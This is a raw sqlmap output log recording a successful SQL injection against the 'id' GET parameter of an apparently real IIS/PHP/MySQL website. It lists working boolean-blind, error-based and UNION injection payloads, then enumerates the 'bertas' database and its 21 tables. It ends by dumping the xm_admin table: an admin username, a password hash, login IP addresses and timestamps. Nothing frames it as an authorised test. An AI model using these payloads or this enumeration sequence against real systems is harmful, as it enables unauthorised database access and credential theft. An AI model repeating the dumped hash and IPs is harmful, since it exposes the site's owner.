sqlmap log3

1. sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
2. ---
3. Parameter: id (GET)
4. Type: boolean-based blind
5. Title: AND boolean-based blind - WHERE or HAVING clause
6. Payload: id=3 AND 3818=3818
7.  
8. Type: error-based
9. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
10. Payload: id=3 AND (SELECT 1598 FROM(SELECT COUNT(*),CONCAT(0x71706b7071,(SELECT (ELT(1598=1598,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
11.  
12. Type: UNION query
13. Title: Generic UNION query (NULL) - 12 columns
14. Payload: id=-5419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7071,0x796343437159674c6f4d72634865785551484952624978715657574f625566486b4c4b4e76647762,0x716a7a7871),NULL,NULL,NULL,NULL,NULL,NULL-- MCnT
15. ---
16. web server operating system: Windows 2003 or XP
17. web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
18. back-end DBMS: MySQL >= 5.0
19. sqlmap resumed the following injection point(s) from stored session:
20. ---
21. Parameter: id (GET)
22. Type: boolean-based blind
23. Title: AND boolean-based blind - WHERE or HAVING clause
24. Payload: id=3 AND 3818=3818
25.  
26. Type: error-based
27. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
28. Payload: id=3 AND (SELECT 1598 FROM(SELECT COUNT(*),CONCAT(0x71706b7071,(SELECT (ELT(1598=1598,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
29.  
30. Type: UNION query
31. Title: Generic UNION query (NULL) - 12 columns
32. Payload: id=-5419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7071,0x796343437159674c6f4d72634865785551484952624978715657574f625566486b4c4b4e76647762,0x716a7a7871),NULL,NULL,NULL,NULL,NULL,NULL-- MCnT
33. ---
34. web server operating system: Windows 2003 or XP
35. web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
36. back-end DBMS: MySQL >= 5.0
37. available databases [2]:
38. [*] bertas
39. [*] information_schema
40.  
41. sqlmap resumed the following injection point(s) from stored session:
42. ---
43. Parameter: id (GET)
44. Type: boolean-based blind
45. Title: AND boolean-based blind - WHERE or HAVING clause
46. Payload: id=3 AND 3818=3818
47.  
48. Type: error-based
49. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
50. Payload: id=3 AND (SELECT 1598 FROM(SELECT COUNT(*),CONCAT(0x71706b7071,(SELECT (ELT(1598=1598,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
51.  
52. Type: UNION query
53. Title: Generic UNION query (NULL) - 12 columns
54. Payload: id=-5419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7071,0x796343437159674c6f4d72634865785551484952624978715657574f625566486b4c4b4e76647762,0x716a7a7871),NULL,NULL,NULL,NULL,NULL,NULL-- MCnT
55. ---
56. web server operating system: Windows 2003 or XP
57. web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
58. back-end DBMS: MySQL >= 5.0
59. Database: bertas
60. [21 tables]
61. +------------------+
62. | xm_admin |
63. | xm_adv |
64. | xm_basic |
65. | xm_benmessage |
66. | xm_biao |
67. | xm_blog |
68. | xm_bmessage |
69. | xm_certification |
70. | xm_content |
71. | xm_contentlist |
72. | xm_download |
73. | xm_firstclass |
74. | xm_linkss |
75. | xm_message |
76. | xm_news |
77. | xm_newslist |
78. | xm_piclink |
79. | xm_product |
80. | xm_secondclass |
81. | xm_userinfo |
82. | xm_zhaopin |
83. +------------------+
84.  
85. sqlmap resumed the following injection point(s) from stored session:
86. ---
87. Parameter: id (GET)
88. Type: boolean-based blind
89. Title: AND boolean-based blind - WHERE or HAVING clause
90. Payload: id=3 AND 3818=3818
91.  
92. Type: error-based
93. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
94. Payload: id=3 AND (SELECT 1598 FROM(SELECT COUNT(*),CONCAT(0x71706b7071,(SELECT (ELT(1598=1598,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
95.  
96. Type: UNION query
97. Title: Generic UNION query (NULL) - 12 columns
98. Payload: id=-5419 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706b7071,0x796343437159674c6f4d72634865785551484952624978715657574f625566486b4c4b4e76647762,0x716a7a7871),NULL,NULL,NULL,NULL,NULL,NULL-- MCnT
99. ---
100. web server operating system: Windows 2003 or XP
101. web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
102. back-end DBMS: MySQL >= 5.0
103. Database: bertas
104. Table: xm_admin
105. [1 entry]
106. +----+------------------------------------------+-------+--------------+--------------+---------------------+---------------------+
107. | id | pwd | name | loginip | ploginip | logintime | plogintime |
108. +----+------------------------------------------+-------+--------------+--------------+---------------------+---------------------+
109. | 1 | e75252b57f7506a5b55b4515f1940a0715dd96d5 | admin | 59.58.175.66 | 59.58.175.66 | 2015-09-24 09:51:12 | 2015-09-23 09:54:57 |
110. +----+------------------------------------------+-------+--------------+--------------+---------------------+---------------------+